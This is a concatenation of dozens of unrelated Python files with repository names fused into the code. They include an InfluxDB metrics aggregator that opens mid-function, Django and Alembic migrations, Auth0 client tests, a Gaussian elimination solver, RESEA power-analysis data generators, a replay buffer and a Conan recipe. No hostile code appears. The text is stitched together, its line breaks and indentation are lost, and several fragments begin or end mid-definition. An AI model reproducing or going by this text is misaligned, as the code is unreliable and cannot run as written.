append_to_batch(batch, requests): for key in requests: if key not in list(batch.keys()): batch[key] = requests[key] else: for each in ["timestamps", "response_times", "1xx", "2xx", "3xx", "4xx", "5xx", "NaN"]: batch[key][each].extend(requests[key][each]) if __name__ == '__main__': args = get_args() external_client = InfluxDBClient(args["influx_host"], args["influx_port"], args["influx_user"], args["influx_password"], args["influx_db"]) local_client = InfluxDBClient("localhost", "8086", "", "", "local") requests_last_read_time = '1970-01-01T19:25:26.005Z' users_last_read_time = '1970-01-01T19:25:26.005Z' iteration = 0 processing_time = 0 ok_requests_10min_batch, ko_requests_10min_batch, ok_requests_5min_batch, ko_requests_5min_batch = {}, {}, {}, {} users_10min_batch, users_5min_batch = {"timestamps": [], "active": []}, {"timestamps": [], "active": []} while True: iteration += 1 pause = 60 - processing_time if processing_time < 60 else 1 sleep(pause) tik = time() requests_data = list(local_client.query(SELECT_REQUESTS_DATA.format(args["simulation"], requests_last_read_time)).get_points()) users_data = list(local_client.query(SELECT_USERS_DATA.format(users_last_read_time)).get_points()) if requests_data: requests_last_read_time = requests_data[-1]['time'] users_last_read_time = users_data[-1]['time'] ok_requests, ko_requests = aggregate_results(requests_data) append_to_batch(ok_requests_5min_batch, ok_requests) append_to_batch(ko_requests_5min_batch, ko_requests) resample_and_send_to_influx(external_client, args, ok_requests, ko_requests, "1S", iteration) resample_and_send_to_influx(external_client, args, ok_requests, ko_requests, "5S", iteration) resample_and_send_to_influx(external_client, args, ok_requests, ko_requests, "30S", iteration) # Resample users data users = {"timestamps": [], "active": []} for each in users_data: users["timestamps"].append(each["time"]) users["active"].append(each["active"]) users_5min_batch["timestamps"].extend(users["timestamps"]) users_5min_batch["active"].extend(users["active"]) resample_users_and_send_to_influx(external_client, args, users, "1S") resample_users_and_send_to_influx(external_client, args, users, "5S") resample_users_and_send_to_influx(external_client, args, users, "30S") if iteration in [5, 10]: resample_and_send_to_influx(external_client, args, ok_requests_5min_batch, ko_requests_5min_batch, "1T", iteration) resample_and_send_to_influx(external_client, args, ok_requests_5min_batch, ko_requests_5min_batch, "5T", iteration) append_to_batch(ok_requests_10min_batch, ok_requests_5min_batch) append_to_batch(ko_requests_10min_batch, ko_requests_5min_batch) del ok_requests_5min_batch del ko_requests_5min_batch ok_requests_5min_batch, ko_requests_5min_batch = {}, {} # Resample users data resample_users_and_send_to_influx(external_client, args, users_5min_batch, "1T") resample_users_and_send_to_influx(external_client, args, users_5min_batch, "5T") users_10min_batch["timestamps"].extend(users_5min_batch["timestamps"]) users_10min_batch["active"].extend(users_5min_batch["active"]) del users_5min_batch users_5min_batch = {"timestamps": [], "active": []} if iteration == 10: resample_and_send_to_influx(external_client, args, ok_requests_10min_batch, ko_requests_10min_batch, "10T", iteration) del ok_requests_10min_batch del ko_requests_10min_batch ok_requests_10min_batch, ko_requests_10min_batch = {}, {} # Resample users data resample_users_and_send_to_influx(external_client, args, users_10min_batch, "10T") del users_10min_batch users_10min_batch = 
{"timestamps": [], "active": []} iteration = 0 processing_time = round(time() - tik, 2) print(f"Total time - {processing_time} sec") #!/usr/bin/env python from agv2_smach.srv import * import rospy def task_plan_func(req): req_task = req.request_task rospy.init_node('agv_task_plan_service') agv_task = list(rospy.get_param('~Tasks/' + req_task)) print(agv_task) return TaskServiceResponse(str(agv_task)) def task_plan(): rospy.init_node('agv_task_plan_service') s = rospy.Service('agv_task_service', TaskService, task_plan_func) rospy.spin() if __name__ == "__main__": task_plan() import unittest import mock from auth0_client.v3.management.rules import Rules class TestRules(unittest.TestCase): @mock.patch('auth0_client.v3.management.rules.RestClient') def test_all(self, mock_rc): mock_instance = mock_rc.return_value c = Rules(domain='domain', token='') # with default params c.all() args, kwargs = mock_instance.get.call_args self.assertEqual('https://domain/api/v2/rules', args[0]) self.assertEqual(kwargs['params'], {'fields': None, 'include_fields': 'true', 'enabled': 'true', 'stage': 'login_success', 'page': None, 'per_page': None, 'include_totals': 'false'}) # with stage and fields params c.all(stage='stage', enabled=False, fields=['a', 'b'], include_fields=False) args, kwargs = mock_instance.get.call_args self.assertEqual('https://domain/api/v2/rules', args[0]) self.assertEqual(kwargs['params'], {'fields': 'a,b', 'include_fields': 'false', 'enabled': 'false', 'stage': 'stage', 'page': None, 'per_page': None, 'include_totals': 'false'}) # with pagination params c.all(page=3, per_page=27, include_totals=True) args, kwargs = mock_instance.get.call_args self.assertEqual('https://domain/api/v2/rules', args[0]) self.assertEqual(kwargs['params'], {'fields': None, 'include_fields': 'true', 'enabled': 'true', 'stage': 'login_success', 'page': 3, 'per_page': 27, 'include_totals': 'true'}) @mock.patch('auth0_client.v3.management.rules.RestClient') def test_create(self, mock_rc): mock_instance = mock_rc.return_value c = Rules(domain='domain', token='') c.create({'a': 'b', 'c': 'd'}) args, kwargs = mock_instance.post.call_args self.assertEqual('https://domain/api/v2/rules', args[0]) self.assertEqual(kwargs['data'], {'a': 'b', 'c': 'd'}) @mock.patch('auth0_client.v3.management.rules.RestClient') def test_get(self, mock_rc): mock_instance = mock_rc.return_value c = Rules(domain='domain', token='') c.get('an-id') args, kwargs = mock_instance.get.call_args self.assertEqual('https://domain/api/v2/rules/an-id', args[0]) self.assertEqual(kwargs['params'], {'fields': None, 'include_fields': 'true'}) c.get('an-id', fields=['a', 'b'], include_fields=False) args, kwargs = mock_instance.get.call_args self.assertEqual('https://domain/api/v2/rules/an-id', args[0]) self.assertEqual(kwargs['params'], {'fields': 'a,b', 'include_fields': 'false'}) @mock.patch('auth0_client.v3.management.rules.RestClient') def test_delete(self, mock_rc): mock_instance = mock_rc.return_value c = Rules(domain='domain', token='') c.delete('an-id') mock_instance.delete.assert_called_with( 'https://domain/api/v2/rules/an-id' ) @mock.patch('auth0_client.v3.management.rules.RestClient') def test_update(self, mock_rc): mock_instance = mock_rc.return_value c = Rules(domain='domain', token='') c.update('an-id', {'a': 'b', 'c': 'd'}) args, kwargs = mock_instance.patch.call_args self.assertEqual('https://domain/api/v2/rules/an-id', args[0]) self.assertEqual(kwargs['data'], {'a': 'b', 'c': 'd'}) from simple_object_tracking.trackers.centroid_tracker import 
PointTracker """empty message Revision ID: Revises: Create Date: 2017-10-14 19:45:52.372000 """ # revision identifiers, used by Alembic. revision = '' down_revision = '' from alembic import op import sqlalchemy as sa def upgrade(): # ### commands auto generated by Alembic - please adjust! ### pass # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! ### pass # ### end Alembic commands ### import sqlite3 #criar banco de dados conn=sqlite3.connect('usersdatabase.db') c=conn.cursor() sql=""" DROP TABLE IF EXISTS users; CREATE TABLE users ( id integer unique primary key autoincrement, name text); """ # Tabela users com duas colunas(id e nome). c.executescript(sql) print('[SISTEMA] Banco de dados criado com sucesso!') conn.commit() conn.close() # application configs loaded during boot class ConnectionConfig: connection_details = None avro_topics = None logger_details = None # Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the License); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an AS IS BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Connection between two entities.""" class Connection(object): """A connection between a source and target entity with a certain type. The target entity is implied to be the same as the entity that contains this Connection instance. Attributes: ctype: type of the connection (NOTE: 'type' is a reserved Python keyword) source: GUID of the source entity """ def __init__(self, ctype, source): super().__init__() self.ctype = ctype self.source = source def __eq__(self, other): return self.ctype == other.ctype and self.source == other.source def __hash__(self) -> int: return hash((self.ctype, self.source)) tests/fft/test_fft.py from __future__ import print_function, unicode_literals, absolute_import, division import numpy as np import numpy.testing as npt from itertools import product from termcolor import colored from gputools import fft, fft_convolve, fft_plan, init_device #init_device(id_platform = 0, id_device = 1) def report_str(success): return colored("\t[OK]", "blue") if success else colored("\t[FAIL]", "red") def _compare_fft_np(d): res1 = np.fft.fftn(d) res2 = fft(d, fast_math=True) return res1, res2 def test_compare(): for ndim in [1, 2, 3]: for dshape in product([32, 64, 128], repeat=ndim): d = np.random.uniform(-1, 1, dshape).astype(np.complex64) res1, res2 = _compare_fft_np(d) print("validating fft of size", d.shape) npt.assert_allclose(res1, res2, rtol=1.e-0, atol=1.e-1) if __name__ == '__main__': # test_compare() # dshape = (128, 128) np.random.seed(0) d = np.random.uniform(-1, 1, dshape).astype(np.complex64) res1 = np.fft.fftn(d) res2 = fft(d) danjac/jcasts10-100 # Generated by Django 3.2.8 on 2021-11-06 13:10 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ("podcasts", "0078_podcast_frequency"), ] operations = [ migrations.AddField( model_name="podcast", name="scheduled", field=models.DateTimeField(blank=True, null=True), ), ] liRONCO11/optimus import os from optimus.helpers.logger import logger from optimus.helpers.functions import prepare_path_local, 
path_is_local class Save: def __init__(self, root): self.root = root def json(self, path, storage_options=None, conn=None, *args, **kwargs): """ Save data frame in a json file :param path: path where the spark will be saved. :param mode: Specifies the behavior of the save operation when data already exists. "append": Append contents of this DataFrame to existing data. "overwrite" (default case): Overwrite existing data. "ignore": Silently ignore this operation if data already exists. "error": Throw an exception if data already exists. :param num_partitions: the number of partitions of the DataFrame :return: """ df = self.root.data if conn is not None: path = conn.path(path) storage_options = conn.storage_options try: os.makedirs(path, exist_ok=True) df.to_json(filename=path, storage_options=storage_options, *args, **kwargs) except (OSError, IOError) as error: logger.print(error) raise # print("Creation of the directory %s failed" % path) # else: # print("Successfully created the directory %s" % path) def csv(self, path, mode="wt", index=False, single_file=True, storage_options=None, conn=None, **kwargs): """ Save data frame to a CSV file. :param mode: 'rb', 'wt', etc :param single_file: :param index: :param path: path where the spark will be saved. it uses the default value. :return: Dataframe in a CSV format in the specified path. """ df = self.root.data if conn is not None: path = conn.path(path) storage_options = conn.storage_options try: if path_is_local(path): prepare_path_local(path) df.to_csv(filename=path, mode=mode, index=index, single_file=single_file, storage_options=storage_options, **kwargs) except IOError as error: logger.print(error) raise def parquet(self, path, mode="overwrite", num_partitions=1, engine="pyarrow", storage_options=None, conn=None, **kwargs): """ Save data frame to a parquet file :param path: path where the spark will be saved. :param mode: Specifies the behavior of the save operation when data already exists. "append": Append contents of this DataFrame to existing data. "overwrite" (default case): Overwrite existing data. "ignore": Silently ignore this operation if data already exists. "error": Throw an exception if data already exists. 
:param num_partitions: the number of partitions of the DataFrame :return: """ # This character are invalid as column names by parquet invalid_character = [" ", ",", ";", "{", "}", "(", ")", "\n", "\t", "="] def func(col_name): for i in invalid_character: col_name = col_name.replace(i, "_") return col_name df = self.root.cols.rename(func) if conn is not None: path = conn.path(path) storage_options = conn.storage_options dfd = df.data try: if engine == 'pyarrow': dfd.to_parquet(path, engine='pyarrow', storage_options=storage_options, **kwargs) elif engine == "fastparquet": dfd.to_parquet(path, engine='fastparquet', storage_options=storage_options, **kwargs) except IOError as e: logger.print(e) raise @staticmethod def avro(path): raise NotImplementedError('Not implemented yet') 0 """ Script to log rasppi cpu temp """ import os import datetime import itertools import time def get_cpu_temp(): res = os.popen('vcgencmd measure_temp').readline() res = res.replace("temp=", "").replace("'C\n", "") return float(res) class Sensor: def __iter__(self): return self def __next__(self): return get_cpu_temp() sensor = Sensor() timestamps = iter(datetime.datetime.now, None) for stamp, value in itertools.islice(zip(timestamps, sensor), 10): print(stamp, value) time.sleep(1) import ipdb import numpy as np import matplotlib.pyplot as plt results = { 'Garbage': [ 0.359357, 0.345487, 0.300246 ], 'Simple Features': [ 0.344599, 0.422152, 0.390513 ], '+ Physicochemical': [ 0.527414, 0.625990, 0.506098 ], '+ Single Amino Acids': [ 0.532850, 0.641846, 0.537188 ], '+ Dipeptide': [ 0.537295, 0.642724, 0.583942 ] } width = 0.2 ind = np.arange(5) fig, ax = plt.subplots() log_regression = list() gb_trees = list() knearest_neighbors = list() labels = ['Garbage', 'Simple Features', '+ Physicochemical', '+ Single Amino Acids', '+ Dipeptide'] for key in labels: log_regression.append(results[key][0]) gb_trees.append(results[key][1]) knearest_neighbors.append(results[key][2]) opacity = 0.5 log_regression_bars = ax.bar(ind, log_regression, width, color='r', alpha=opacity) gb_trees_bars = ax.bar(ind+width, gb_trees, width, color='b', alpha=opacity) knearest_neighbors_bars = ax.bar(ind+2*width, knearest_neighbors, width, color='g', alpha=opacity) # add some text for labels, title and axes ticks ax.set_ylabel('Accuracy') ax.set_title('Accuracy by model and features') ax.set_xticks(ind + width / 2) ax.set_xticklabels(labels, rotation=10) ax.legend((log_regression_bars[0], gb_trees_bars[0], knearest_neighbors_bars[0]), ('Logistic Regression', 'Gradient Boosted Trees', 'K Nearest Neighbor')) #plt.show() plt.savefig('report/histogram.png') import numpy as np import sys def cof_input(i, state): while True: try: show = 'x' if state == 0 else 'b' var = float(input(f"Коэффициент при {show}{i+1}: ")) except ValueError: print("Неверное значение, попробуйте снова") else: return var n = int(input("Введите размерность матрицы: ")) print("\nВведите коэффициенты при \'x\'", end='\n') x = [[cof_input(i, 0) for i in range(n)] for j in range(n)] x_copy = [row[:] for row in x] print("\nВведите свободные коэффициенты", end='\n') b = [cof_input(i, 1) for i in range(n)] norm_b = max(b) print("\nМатрица:", end='\n') for s in x: print(s, end='\n') print("\nСвободные коэффициенты:", end='\n') for s in b: print(s, end='\n') count = 0 for j in range(count, n - 1): for i in range(count, n - 1): if not x[j][j]: x[j], x[j + 1] = x[j + 1], x[j] b[j], b[j + 1] = b[j + 1], b[j] m = - x[i + 1][j] / x[j][j] mx = [m*l for l in x[j]] b[i + 1] += m * b[j] for k in 
range(n): x[i + 1][k] += mx[k] count += 1 for i in range(n): x[i].reverse() x.reverse() b.reverse() roots_vect = [] for i in range(n): for j in range(n): if i == n - 1: for k in range(n - 1): b[i] -= roots_vect[k] * x[i][k] roots_vect.append(b[i] / x[i][n - 1]) break if x[i][j + 1] == 0: roots_vect.append(b[i] / x[i][j]) break else: b[i] -= roots_vect[j] * x[i][j] roots_vect.reverse() format_roots = [f"x{i + 1}: {roots_vect[i]}; " for i in range(len(roots_vect))] print("\nКорни СЛАУ: ", "".join(format_roots)) print("\nОбратная матрица системы:", end='\n') try: inv = np.linalg.inv(x_copy) except np.linalg.LinAlgError: print("Невозможно найти обратную матрицу") else: print("{}".format(inv)) norm_x = max(sum(x_copy[i]) for i in range(n)) norm_inv = max(sum(inv[i]) for i in range(n)) norm_roots = max(roots_vect) abs_b = 0.001 rel_b = abs_b / norm_b abs_x = norm_inv * abs_b rel_x = norm_x * norm_inv * rel_b print(f"\nАбсолютная погрешность x = {abs_x}", f"Относительная погрешность x <= {rel_x}\n") file = open('attendance.txt', 'r') lines = file.read().split('\n') print(lines) if lines[0] == '': exit(0) for l in lines: print("H")Jeanluis019/feline from __future__ import annotations from django.shortcuts import render from django.views.generic import DetailView, ListView, CreateView from .models import Company, JobPost class JobPostListView(ListView): model = JobPost paginate_by = 10 jobpost_list_view = JobPostListView.as_view() class JobPostDetailView(DetailView): model = JobPost slug_field = "slug" slug_url_kwarg = "slug" jobpost_detail_view = JobPostDetailView.as_view() class JobPostCreateView(CreateView): model = JobPost success_url = "/" fields = ['company', 'location', 'how_to_apply', 'application_url', 'application_email', 'job_type', 'category', 'tags', 'currency','salary_range_start_at', 'salary_range_end_at', 'sponsor_relocation'] def get_context_data(self, **kwargs: Any) -> Dict[str, Any]: context = super().get_context_data(**kwargs) context['form'].fields['company'].queryset = Company.objects.filter(user=self.request.user) return context jobpost_create_view = JobPostCreateView.as_view()profiling/random_removes_list.py0 import random import sys import time l = list() LIST_SIZE = 200000 MININT = -sys.maxsize - 1 for i in range(LIST_SIZE): l.append(random.randint(MININT, sys.maxsize)) AMOUNT_OF_REMOVES = 50000 START_TIME = time.time() for i in range(AMOUNT_OF_REMOVES): l.pop(random.randint(0, LIST_SIZE - 1)) LIST_SIZE -= 1 print("Time taken: ", time.time() - START_TIME) thepolicylab/DLT-RESEAsrc/dlt/power_analysis_utils.py from typing import List, Optional, Tuple, Union import numpy as np import pandas as pd def _convert_seed_to_randomstate( seed: Optional[Union[int, np.random.mtrand.RandomState]] ) -> np.random.mtrand.RandomState: if not seed: return np.random if isinstance(seed, int): return np.random.RandomState(seed) return seed def gen_annual_income( number_control_per_week: Union[int, List[int]], effect_size: float, inc_base_rate: int = 36_121, inc_base_std: int = 5_000, inc_treatment_std: int = 5_000, number_of_weeks: int = 13, number_treat_per_week: int = 150, seed: Optional[Union[int, np.random.mtrand.RandomState]] = 189389, ) -> Tuple[pd.DataFrame, pd.DataFrame]: """ Generates annual income before and after RESEA intervention according to a normal distribution using `np.random.randn`. The initial_value is used in generating outcome_value to ensure some correlation. Args: number_control_per_week: a single number if control does not vary weekly. 
List of int otherwise effect_size: used to define the treatment effect, which modifies the mean of generated data inc_base_rate: average income per capita in RI in 2019 according to https://www.census.gov/quickfacts/fact/table/RI,US/INC110219 inc_base_std: standard deviation for the normal distribution generation inc_treatment_std: given the randomness of assignemnt to treatment, there should be no difference between base and treatment a priori number_of_weeks: how many cohorts we want to generate. Defaults to 13 because we generate data quarterly number_treat_per_week: number of individuals selected for treatment. Defaults to 150 based on DLT's experiment design seed: seed for randomization Returns: treated_df, control_df """ random = _convert_seed_to_randomstate(seed) # Define the effect inc_treatment_effect = inc_base_rate * effect_size inc_initial_value_of_treated = ( random.randn(number_of_weeks * number_treat_per_week) * inc_base_std + inc_base_rate ) inc_outcome_value_of_treated = ( inc_initial_value_of_treated + random.randn(number_of_weeks * number_treat_per_week) * inc_treatment_std + inc_treatment_effect ) inc_initial_value_of_control = ( random.randn(number_of_weeks * number_control_per_week) * inc_base_std + inc_base_rate ) inc_outcome_value_of_control = ( random.randn(number_of_weeks * number_control_per_week) * inc_base_std + inc_base_rate ) control_df = pd.DataFrame( { "inc_initial": inc_initial_value_of_control, "inc_outcome": inc_outcome_value_of_control, } ) treated_df = pd.DataFrame( { "inc_initial": inc_initial_value_of_treated, "inc_outcome": inc_outcome_value_of_treated, } ) return treated_df, control_df def gen_employment( number_control_per_week: Union[int, List[int]], effect_size: float, emp_base_rate: float = 0.62, number_of_weeks: int = 13, number_treat_per_week=150, seed: Optional[Union[int, np.random.mtrand.RandomState]] = 189389, ) -> Tuple[pd.DataFrame, pd.DataFrame]: """ Generates employment outcomes after RESEA intervention according to a binomial distribution using `np.random.binomial`. Input for binomial distribution is determined by `effect_size` and `emp_base_rate` variables. Args: number_control_per_week: a single number if control does not vary weekly. List of int otherwise effect_size: used to define the treatment effect, which modifies the mean of generated data emp_base_rate: default reemployment rate assuming no RESEA interventionn. Defaults to 0.62, which was the reemployment rate at Boston for 2018 according to https://oui.doleta.gov/unemploy/uir_rates.asp number_of_weeks: how many cohorts we want to generate. Defaults to 13 because we generate data quarterly number_treat_per_week: number of individuals selected for treatment. 
Defaults to 150 based on DLT's experiment design seed: seed for randomization Returns: treated_df, control_df """ random = _convert_seed_to_randomstate(seed) # the amount we expect incrased emp_treatment_effect = float(emp_base_rate * (1 + effect_size)) try: emp_outcome_value_of_treated = random.binomial( 1, emp_treatment_effect, size=number_of_weeks * number_treat_per_week ) except ValueError: print(f"error at {emp_treatment_effect}") try: emp_outcome_value_of_control = random.binomial( 1, emp_base_rate, size=number_of_weeks * number_control_per_week, ) except ValueError: print(f"error at {emp_base_rate}") treated_df = pd.DataFrame({"employment": emp_outcome_value_of_treated}) control_df = pd.DataFrame({"employment": emp_outcome_value_of_control}) return treated_df, control_df def gen_pay_ratio( number_control_per_week: Union[int, List[int]], effect_size: float, pay_ratio_lambda=0.5, pay_ratio_min=11.50, distribution: str = "exponential", number_of_weeks: int = 13, number_treat_per_week=150, seed: Optional[Union[int, np.random.mtrand.RandomState]] = 189389, ) -> Tuple[pd.DataFrame, pd.DataFrame]: """ Generates pay ratio outcomes after RESEA intervention according to a distribution. The distribution can be exponential or pareto depending on the user's assumptions about the population of individuals eligible for unemployment. Specifically, the exponential distribution assumes the majority of individuals are making close to minimum wage, while the pareto assumes a heavier tail. As everyone is assumed from an initial pay ratio of 0; we only generate the outcome ratio. Args: number_control_per_week: a single number if control does not vary weekly. List of int otherwise effect_size: used to define the treatment effect, which modifies the mean of generated data pay_ratio_lambda: input for exponential and pareto distribution. pay_ratio_min: minimum wage for RI in 2021 distribution: selection of data generating distribution; either exponential or pareto number_of_weeks: how many cohorts we want to generate. Defaults to 13 because we generate data quarterly. number_treat_per_week: number of individuals selected for treatment. 
Defaults to 150 based on DLT's experiment design seed: seed for randomization Returns: treated_df, control_df """ random = _convert_seed_to_randomstate(seed) if distribution == "exponential": pay_ratio_outcome_value_of_treated = ( random.exponential( pay_ratio_lambda, number_of_weeks * number_treat_per_week ) * (1 - effect_size) + 1 ) * pay_ratio_min pay_ratio_outcome_value_of_control = ( random.exponential( pay_ratio_lambda, number_of_weeks * number_control_per_week, ) + 1 ) * pay_ratio_min elif distribution == "pareto": pay_ratio_outcome_value_of_treated = ( random.pareto(1 / pay_ratio_lambda, number_of_weeks * number_treat_per_week) + 1 * (1 - effect_size) ) * pay_ratio_min pay_ratio_outcome_value_of_control = ( random.pareto( 1 / pay_ratio_lambda, number_of_weeks * number_control_per_week, ) + 1 ) * pay_ratio_min else: raise ValueError( f"distribution must be one of 'pareto' or 'exponential', not {distribution}" ) treated_df = pd.DataFrame({"pay_ratio": pay_ratio_outcome_value_of_treated}) control_df = pd.DataFrame({"pay_ratio": pay_ratio_outcome_value_of_control}) return treated_df, control_df def gen_weeks_on_unemployment( number_control_per_week: Union[int, List[int]], effect_size: float, qt_unemp_lambda: float = 3, number_of_quarters: int = 6, number_of_weeks: int = 13, number_treat_per_week: int = 150, seed: Optional[Union[int, np.random.mtrand.RandomState]] = 189389, ) -> Tuple[pd.DataFrame, pd.DataFrame]: """ Generates weeks of unemployment after RESEA intervention according to a exponential distribution using `np.random.exponential`. Input for exponential distribution is determined by `qt_unemp_lambda` and `number_of_quarters` variables. Args: number_control_per_week: a single number if control does not vary weekly. List of int otherwise effect_size: used to define the treatment effect, which modifies the mean of generated data qt_unemp_lambda: expected frequency of weeks on unemployment for quarter. source: https://www.bls.gov/web/empsit/cpseea12.htm number_of_quarters: The number of quarters. Defaults to 6 to adjust the lambda rate for the 1.5 year study period. number_of_weeks: how many cohorts we want to generate. Defaults to 13 because we generate data quarterly. number_treat_per_week: number of individuals selected for treatment. Defaults to 150 based on DLT's experiment design seed: seed for randomization Returns: treated_df, control_df """ random = _convert_seed_to_randomstate(seed) # attempt to estimate this as exponential distribution, # because the event can be modeled as the time between occurrances unemp_lambda = qt_unemp_lambda * number_of_quarters unemp_treatment_effect = unemp_lambda * (1 - effect_size) unemp_outcome_value_of_treat = random.exponential( unemp_treatment_effect, size=number_of_weeks * number_treat_per_week ) unemp_outcome_value_of_control = random.exponential( unemp_lambda, size=number_of_weeks * number_control_per_week ) treated_df = pd.DataFrame({"wks_unemp": unemp_outcome_value_of_treat}) control_df = pd.DataFrame({"wks_unemp": unemp_outcome_value_of_control}) return treated_df, control_df def gen_cohorts( df: pd.DataFrame, cohort_unit: int, is_treated: bool = True, ) -> pd.DataFrame: """ N.B. 
alters df in place and also returns it """ if is_treated: df["cohort"] = np.arange(len(df), dtype=int) // cohort_unit df["is_treated"] = True else: df["cohort"] = np.arange(len(df), dtype=int) // cohort_unit df["is_treated"] = False ### Alternatively, this is where we implement the reduction if we want weekly variation return df users/migrations/0003_customuser_bibgroup.py # Generated by Django 3.0.4 on 2020-04-01 15:46 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('search', '0004_authors_journals_results'), ('users', '0002_remove_customuser_bibgroup'), ] operations = [ migrations.AddField( model_name='customuser', name='bibgroup', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='search.Bibgroup'), ), ] from turtle import Turtle import random STARTING_MOVE_DISTANCE = 5 MOVE_INCREMENT = 10 colors = ['blue', 'green', 'yellow', 'red', 'orange', 'cyan', 'magenta', 'purple', 'black'] class Car: def __init__(self): self.all_cars = [] self.car_speed = STARTING_MOVE_DISTANCE def create_cars(self): random_chance = random.randint(1,6) if random_chance == 1: new_car = Turtle() new_car.shape('circle') new_car.color(random.choice(colors)) new_car.penup() new_car.goto(280, random.randint(-250, 250)) new_car.speed(MOVE_INCREMENT) self.all_cars.append(new_car) def moving(self): for car in self.all_cars: car.backward(self.car_speed) def level_up(self): self.car_speed += MOVE_INCREMENT import jinja2 import json import yaml from pydantic.json import pydantic_encoder from .config import settings from . import models, utils def toyaml(obj): """ Filter for converting an object to YAML that is able to handle Pydantic models. """ # In order to benefit from the Pydantic encoder we need to go via JSON obj_json = json.dumps(obj, default = pydantic_encoder) return yaml.safe_dump(json.loads(obj_json)) class Loader: """ Class for returning objects created by rendering YAML templates from this package. """ def __init__(self, **globals): # Create the package loader for the parent module of this one loader = jinja2.PackageLoader(self.__module__.rsplit(".", maxsplit = 1)[0]) self.env = jinja2.Environment(loader = loader, autoescape = False) self.env.globals.update(globals) self.env.filters.update( mergeconcat = utils.mergeconcat, fromyaml = yaml.safe_load, toyaml = toyaml ) def loads(self, template, **params): """ Render the specified template with the given params and return the result as a string. """ return self.env.get_template(template).render(**params) def load(self, template, **params): """ Render the specified template with the given params, load the result as a YAML document and return the resulting object. 
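        Illustrative usage (the template name below is hypothetical; any template
        shipped in this package's jinja2 templates directory works the same way):

            obj = default_loader.load("example.yaml", name="demo")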
""" return yaml.safe_load(self.loads(template, **params)) default_loader = Loader(settings = settings, models = models) abel-bernabeu/facecompressor1-10 import argparse import autoencoder def addTrainablesArg(parser): parser.add_argument('--model', dest='model', help='Trained model', default='model.pt') def addExchangeArg(parser): parser.add_argument('--exchange', dest='exchange', help='File with exchanged data', required=True) parser = argparse.ArgumentParser() subparsers = parser.add_subparsers(dest="action") encode_parser = subparsers.add_parser('encode') addTrainablesArg(encode_parser) encode_parser.add_argument('--input', dest='input', help='Input image file name', required=True) addExchangeArg(encode_parser) decode_parser = subparsers.add_parser('decode') addTrainablesArg(decode_parser) addExchangeArg(decode_parser) decode_parser.add_argument('--output', dest='output', help='Output image file name', required=True) opts = parser.parse_args() if opts.action == 'encode': autoencoder.encode(opts.model, opts.input, opts.exchange) elif opts.action == 'decode': autoencoder.decode(opts.model, opts.exchange, opts.output) import sys input = sys.stdin.readline j = int(input()) p = int(input()) s = [] m = [] l = [] sReq = [] mReq = [] lReq = [] for i in range(j): temp = input() if temp == 'L\n': l.append(i + 1) elif temp == 'M\n': m.append(i + 1) else: s.append(i + 1) for i in range(p): size, num = input().split() num = int(num) if size == 'L': lReq.append(num) elif size == 'M': mReq.append(num) else: sReq.append(num) def myfunc(jerseys, req): leftReq = set(req) intersect = [] leftJersey = [] for v in jerseys: if v in leftReq: intersect.append(v) leftReq.remove(v) else: leftJersey.append(v) return intersect, leftJersey, list(leftReq) lJerseys, lrgLeft, discard = myfunc(l, lReq) mJerseys, medLeft, mReqLeft = myfunc(m, mReq) sJerseys, disc, sReqLeft = myfunc(s, sReq) t1, t2, t3 = myfunc(medLeft, sReqLeft) mJerseys += t1 mReqLeft += t3 t1, t2, t3 = myfunc(lrgLeft, mReqLeft) lJerseys += t1 print(len(lJerseys + mJerseys + sJerseys))import random import torch import numpy as np class ReplayBuffer(object): def __init__(self, max_length=50000): self.max_length = max_length self.buffer = [] def append(self, state, action, reward, state_next, term): self.buffer.append((state.clone(), action.detach().clone(), reward, state_next.clone(), term)) if len(self.buffer)>self.max_length: self.buffer.pop(0) def sample(self, batch_size): state, action, reward, state_next, term = zip(*random.choices(self.buffer, k=batch_size)) state = torch.stack(state, dim=0) state_next = torch.stack(state_next, dim=0) action = torch.stack(action, dim=0) reward = torch.tensor(reward, device=state.device, dtype=state.dtype) term = torch.tensor(term, dtype=state.dtype, device=state.device) return state, action, reward, state_next, term def get_histograms(self): state, action, reward, state_next, term = self.sample(1000) ah = np.histogram(action.cpu().numpy(), bins=60) rh = np.histogram(reward.cpu().numpy(), bins=60) trh = np.histogram(np.linalg.norm((state_next - state).cpu().numpy(), axis=1)) return ah, rh, trh def __len__(self): return len(self.buffer)#Write a script that detects and prints out your monitor resolution from screeninfo import get_monitors print(get_monitors()) width=get_monitors()[0].width height=get_monitors()[0].height print("Width: %s, Height: %s" % (width, height)) recipes/graphthewy/all/conanfile.py import os from conans import ConanFile, tools from conans.errors import ConanInvalidConfiguration class 
GraphthewyConan(ConanFile): name = "graphthewy" license = "EUPL-1.2" homepage = "https://github.com/alex-87/graphthewy" url = "https://github.com/conan-io/conan-center-index" description = "Simple header-only C++ Library for graph modelling (directed or not) and graph cycle detection. " topics = ("graph", "algorithm", "modelling", "header-only") settings = "compiler" no_copy_source = True def source(self): tools.get(**self.conan_data["sources"][self.version]) os.rename(self.name + "-" + self.version, self._source_subfolder) @property def _compilers_minimum_version(self): return { "Visual Studio": "15.7", "gcc": "7", "clang": "7", "apple-clang": "10" } @property def _source_subfolder(self): return "source_subfolder" def configure(self): if self.settings.compiler.cppstd: tools.check_min_cppstd(self, 17) def lazy_lt_semver(v1, v2): lv1 = [int(v) for v in v1.split(".")] lv2 = [int(v) for v in v2.split(".")] min_length = min(len(lv1), len(lv2)) return lv1[:min_length] < lv2[:min_length] minimum_version = self._compilers_minimum_version.get(str(self.settings.compiler), False) if not minimum_version: self.output.warn("graphthewy requires C++17. Your compiler is unknown. Assuming it supports C++17.") elif lazy_lt_semver(str(self.settings.compiler.version), minimum_version): raise ConanInvalidConfiguration("graphthewy requires C++17, which your compiler does not support.") def package(self): self.copy("LICENSE", dst="licenses", src=self._source_subfolder) self.copy("*.hpp", dst=os.path.join("include", "graphthewy"), src=self._source_subfolder, keep_path=False) def package_id(self): self.info.header_only() from .base import BaseSerializer # noqa from .json import JSONSerializer # noqa from .pickle import PickleSerializer 